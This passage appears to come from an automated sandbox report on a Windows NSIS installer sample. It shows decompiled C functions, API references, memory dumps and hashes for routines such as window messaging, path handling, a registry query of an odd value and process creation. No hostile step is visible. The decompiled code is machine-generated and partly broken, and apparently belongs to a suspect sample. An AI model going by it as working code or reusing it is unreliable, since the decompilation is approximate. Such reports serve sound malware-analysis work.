				_push(_t33);
				E00406186();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                            0x00401e35
                                                                            0x00401e40
                                                                            0x00401e42
                                                                            0x00401e4f
                                                                            0x00401e66
                                                                            0x00401e6b
                                                                            0x00401e78
                                                                            0x00401e7d
                                                                            0x00401e81
                                                                            0x00401e8c
                                                                            0x00401e93
                                                                            0x00401ea5
                                                                            0x00401eab
                                                                            0x00401eb0
                                                                            0x00401eba
                                                                            0x00402620
                                                                            0x00401569
                                                                            0x004029a5
                                                                            0x00402a5d
                                                                            0x00402a69

                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E38
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                            • ReleaseDC.USER32 ref: 00401E6B
                                                                            • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID:
                                                                            • API String ID: 3808545654-0
                                                                            • Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                                            • Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
                                                                            • Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                                            • Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 59%
                                                                            			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                            0x00401c2e
                                                                            0x00401c30
                                                                            0x00401c37
                                                                            0x00401c3a
                                                                            0x00401c3d
                                                                            0x00401c47
                                                                            0x00401c4b
                                                                            0x00401c4e
                                                                            0x00401c57
                                                                            0x00401c57
                                                                            0x00401c5a
                                                                            0x00401c5e
                                                                            0x00401c67
                                                                            0x00401c67
                                                                            0x00401c6a
                                                                            0x00401c6e
                                                                            0x00401c70
                                                                            0x00401cc5
                                                                            0x00401cc7
                                                                            0x00401cd0
                                                                            0x00401cd8
                                                                            0x00401cdb
                                                                            0x00401cdb
                                                                            0x00401ce4
                                                                            0x00000000
                                                                            0x00401c72
                                                                            0x00401c79
                                                                            0x00401c7b
                                                                            0x00401c7e
                                                                            0x00401c84
                                                                            0x00401c8b
                                                                            0x00401c8e
                                                                            0x00401cb6
                                                                            0x00401cea
                                                                            0x00401cea
                                                                            0x00401c90
                                                                            0x00401c9e
                                                                            0x00401ca6
                                                                            0x00401ca9
                                                                            0x00401ca9
                                                                            0x00401c8e
                                                                            0x00401ced
                                                                            0x00401cf0
                                                                            0x00401cf6
                                                                            0x004029a5
                                                                            0x004029a5
                                                                            0x00402a5d
                                                                            0x00402a69

                                                                            APIs
                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                                            • Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
                                                                            • Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                                            • Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405BC0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                            0x00405bc1
                                                                            0x00405bd8
                                                                            0x00405be0
                                                                            0x00405be0
                                                                            0x00405be8

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BCF
                                                                            • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3916508600
                                                                            • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                            • Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
                                                                            • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                            • Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405C59, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405C59(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BEB(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                                                            0x00405c62
                                                                            0x00405c69
                                                                            0x00405c6c
                                                                            0x00405c6e
                                                                            0x00405c72
                                                                            0x00405c87
                                                                            0x00405ca6
                                                                            0x00000000
                                                                            0x00405c8e
                                                                            0x00405c90
                                                                            0x00405c91
                                                                            0x00405c94
                                                                            0x00405c95
                                                                            0x00405c9d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c9f
                                                                            0x00405ca2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ca2
                                                                            0x00000000
                                                                            0x00405c91
                                                                            0x00405c7f
                                                                            0x00000000
                                                                            0x00405c80

                                                                            APIs
                                                                            • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560,00000000), ref: 00405C67
                                                                            • CharNextA.USER32(00000000), ref: 00405C6C
                                                                            • CharNextA.USER32(00000000), ref: 00405C80
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp, xrefs: 00405C5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp
                                                                            • API String ID: 3213498283-3316059076
                                                                            • Opcode ID: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                                                            • Instruction ID: 9a9653d8387983e914f74c1f8e9a863a5ef5a61ad4bce0684ac50a06ae96742d
                                                                            • Opcode Fuzzy Hash: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                                                            • Instruction Fuzzy Hash: 70F06291D0CF612BFB3256684C84B775E88CB55359F18407BDA80EA2C1C27C58808B9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403949, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00403949() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2b4
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2b8
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039A6();
				return E004059F0(_t11, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsr1FDB.tmp", 7);
			}






                                                                            0x00403949
                                                                            0x00403958
                                                                            0x0040395b
                                                                            0x0040395d
                                                                            0x0040395d
                                                                            0x00403964
                                                                            0x0040396c
                                                                            0x0040396f
                                                                            0x00403971
                                                                            0x00403971
                                                                            0x00403971
                                                                            0x00403978
                                                                            0x0040398a

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
                                                                            • CloseHandle.KERNEL32(000002B8,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E
                                                                            • C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp, xrefs: 0040397F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp
                                                                            • API String ID: 2962429428-2716533155
                                                                            • Opcode ID: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                                                            • Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
                                                                            • Opcode Fuzzy Hash: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                                                            • Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004052C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 89%
                                                                            			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d3c = _t16;
							E00404C7F();
						}
						L11:
						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BFF(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004042F8(0x413);
				return 0;
			}





                                                                            0x004052c7
                                                                            0x004052d1
                                                                            0x004052ed
                                                                            0x0040530f
                                                                            0x00405312
                                                                            0x00405318
                                                                            0x00405322
                                                                            0x00405323
                                                                            0x00405325
                                                                            0x0040532b
                                                                            0x0040532b
                                                                            0x00405335
                                                                            0x00000000
                                                                            0x00405343
                                                                            0x004052fa
                                                                            0x00405332
                                                                            0x00405332
                                                                            0x00000000
                                                                            0x00405332
                                                                            0x00405306
                                                                            0x00405308
                                                                            0x00000000
                                                                            0x00405308
                                                                            0x004052d7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004052de
                                                                            0x00000000

                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 004052F2
                                                                            • CallWindowProcA.USER32 ref: 00405343
                                                                              • Part of subcall function 004042F8: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040430A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                                            • Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
                                                                            • Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                                            • Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405CAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E00405CAE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406228(0x422158, _a4);
				_t21 = E00405C59(0x422158);
				if(_t21 != 0) {
					E00406503(_t21);
					if(( *0x42475c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422158;
						while(1) {
							_t11 = lstrlenA(0x422158);
							_push(0x422158);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040659C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C07(0x422158);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC0();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                            0x00405cba
                                                                            0x00405cc5
                                                                            0x00405cc9
                                                                            0x00405cd0
                                                                            0x00405cdc
                                                                            0x00405ce8
                                                                            0x00405ce8
                                                                            0x00405d00
                                                                            0x00405d01
                                                                            0x00405d08
                                                                            0x00405d09
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405cec
                                                                            0x00405cf3
                                                                            0x00405cfb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405cf3
                                                                            0x00405d0b
                                                                            0x00000000
                                                                            0x00405d1f
                                                                            0x00405cde
                                                                            0x00405ce2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ce2
                                                                            0x00405ccb
                                                                            0x00000000

                                                                            APIs
                                                                              • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                                              • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560,00000000), ref: 00405C67
                                                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560,00000000), ref: 00405D01
                                                                            • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560), ref: 00405D11
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp
                                                                            • API String ID: 3248276644-3316059076
                                                                            • Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                                            • Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
                                                                            • Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                                            • Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040610F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                            0x0040611d
                                                                            0x0040611f
                                                                            0x00406137
                                                                            0x0040613c
                                                                            0x00406141
                                                                            0x0040617e
                                                                            0x0040617e
                                                                            0x00406143
                                                                            0x00406155
                                                                            0x00406160
                                                                            0x00406166
                                                                            0x00406170
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406170
                                                                            0x00406183

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,00420530,?,?,?,00000002,uvlcopdlxoed,?,004063C4,80000002), ref: 00406155
                                                                            • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,00420530), ref: 00406160
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: uvlcopdlxoed
                                                                            • API String ID: 3356406503-3939465813
                                                                            • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                            • Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
                                                                            • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                            • Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004058C7(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422558->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                            0x004058d0
                                                                            0x004058f0
                                                                            0x004058f8
                                                                            0x004058fd
                                                                            0x00000000
                                                                            0x00405903
                                                                            0x00405907

                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                                                                            • CloseHandle.KERNEL32(?), ref: 004058FD
                                                                            Strings
                                                                            • Error launching installer, xrefs: 004058DA
